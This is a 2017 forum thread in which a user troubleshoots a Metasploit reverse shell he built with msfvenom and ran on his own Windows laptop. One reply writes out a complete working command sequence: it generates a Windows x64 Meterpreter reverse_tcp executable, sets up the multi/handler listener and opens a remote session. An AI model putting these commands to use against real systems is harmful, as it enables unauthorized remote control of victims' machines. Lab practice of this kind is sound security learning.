Tato Posted September 30, 2017 Share Posted September 30, 2017 Hey guys I have a problem that is bothering me for a long time now.I can't execute a meterpreter shell that I created in Kali Linux I click it and nothing happens.The code I used at the start was (msfvenom -p windows/meterpreter/reverse_tcp LHOST=my ip LPORT=4444..etc and when I launched it on my laptop (windows 8.1) say (We are in the same network): [*] Sending stage (179267 bytes) to (victim ip) [*] Meterpreter session 1 opened ((my ip):4444 -> (victim ip) :63938) at 2017-09-30 18:44:30 +0200 and does nothing more. use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST... set LPORT... exploit If you guys know what the problems is please reply because I don't seem to find it.Thank you in advance. Quote Link to comment Share on other sites More sharing options...
ThoughtfulDev Posted September 30, 2017 Share Posted September 30, 2017 I dont get your problem? Session 1 was opened...so just use sessions to list your sessions and interact with them. This is basic metasploit stuff... maybe you should have a look at metasploit minute. Quote Link to comment Share on other sites More sharing options...
Tato Posted September 30, 2017 Author Share Posted September 30, 2017 I try for a long time but didn't work Quote Link to comment Share on other sites More sharing options...
Tato Posted September 30, 2017 Author Share Posted September 30, 2017 maybe i have to reinstall it? Quote Link to comment Share on other sites More sharing options...
digip Posted September 30, 2017 Share Posted September 30, 2017 Type "sessions", what is listed? Quote Link to comment Share on other sites More sharing options...
Tato Posted October 1, 2017 Author Share Posted October 1, 2017 is listed all the sessions but when i set the session 1(the meterpreter session) nothing happen Quote Link to comment Share on other sites More sharing options...
digip Posted October 1, 2017 Share Posted October 1, 2017 what is the commands you type after interacting with the session? Do a basic ls or dir for windows. Do you get a files listing from the windows machine? If not, something isn't setup 100%. Even id cmd was disabled on the windows 8 machine, you should get some kind of return like "command prompt has been disabled by your administrator" or such. Quote Link to comment Share on other sites More sharing options...
Tato Posted October 1, 2017 Author Share Posted October 1, 2017 No Nothing happen when i try list file or something else. Maybe i have to uninstall metasploit and the install it again. Quote Link to comment Share on other sites More sharing options...
digip Posted October 2, 2017 Share Posted October 2, 2017 (edited) 8 hours ago, Tato said: No Nothing happen when i try list file or something else. Maybe i have to uninstall metasploit and the install it again. I don't think that is the case, but I'd retrace the setup process for the executable run on the victim machine. Make sure you encode the executable with no bad characters to ignore like 0D, 0A, and 00, etc, and pic the right architecture(32 vs 64bit). Make sure you're listening on the correct port or try a different port range. if the victim is in a VM connected to the host or such, make sure bridged networking isn't sharing the same MAC address and they are properly networked. If behind NAT, be sure to port forward properly to the listening machine and so on. Just throwing out things to check and make sure are setup properly. Post the whole string you used to create the binary file. edit: Just to show a working example, here is what I did on my own system against a Windows 7 x64 box. msfvenom --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.66 lport=4444 -b '\x0A\x0D\x00' -f exe -o poop.exe msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.1.66 set lport 4444 exploit sessions sessions 1 dir Edited October 2, 2017 by digip Quote Link to comment Share on other sites More sharing options...
Tato Posted October 2, 2017 Author Share Posted October 2, 2017 Now i try Quote Link to comment Share on other sites More sharing options...
digip Posted October 2, 2017 Share Posted October 2, 2017 If the box is 64bit(which more than likely it is for windows 8) then use what I put above, and not the x86 you tried before. Just need to rule that out and also try adding the tag for no bad characters, ie: x00, etc Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.